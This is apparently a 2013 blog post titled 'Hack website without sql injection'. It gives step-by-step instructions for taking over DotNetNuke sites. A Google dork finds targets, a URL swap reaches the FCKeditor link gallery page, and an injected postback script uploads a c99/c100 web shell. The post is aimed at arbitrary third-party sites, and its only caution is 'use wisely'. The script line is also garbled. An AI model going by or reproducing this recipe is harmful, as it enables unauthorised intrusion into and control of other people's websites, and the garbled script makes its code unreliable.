Tuesday, 6 August 2013

Hack website without sql injection,etc

Actually, I have named this trick: "P0rt@l H@ck!ng (DNN)" 
Step 1: Go To- www.google.comStep 
2: Now enter this dork in search box- :inurl:/tabid/36/ language/en-US/Default.aspx Note: The code used to find vulnerable sites.. Use wisely.. 
Step 3: You will find many sites.. Select which you are comfortable.. 
Step 4: For example, if you take thir site- http:// www.abc.com/Home/tabid/36/language/en-US/Default.aspx Step 5: Now replace code: /Home/tabid/36/language/en-US/Default.aspx with this code: /Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
Step 6: You will get a link gallery page... So far.. So good!Don't do anything...
Step 7: Now replace the URL in address bar with this simple script code:
j-do Post Back ('ctlURL
$cmd Upload',")
Step 8: If the code not work remove the spaces.... Then select root and upload page shell c99, c100..appear at webpage..

1 comment: